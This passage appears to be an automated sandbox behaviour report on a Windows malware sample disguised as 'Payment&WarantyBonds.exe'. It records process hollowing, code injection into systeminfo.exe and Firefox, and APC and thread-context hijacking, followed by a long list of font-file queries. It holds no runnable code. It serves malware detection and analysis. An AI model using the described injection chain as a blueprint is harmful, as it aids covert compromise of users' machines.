Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory written: C:\Users\user\Desktop\Payment&WarantyBonds.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\systeminfo.exe Thread register set: target process: 5856 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\systeminfo.exe Thread APC queued: target process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe" Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe" Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Users\user\Desktop\Payment&WarantyBonds.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
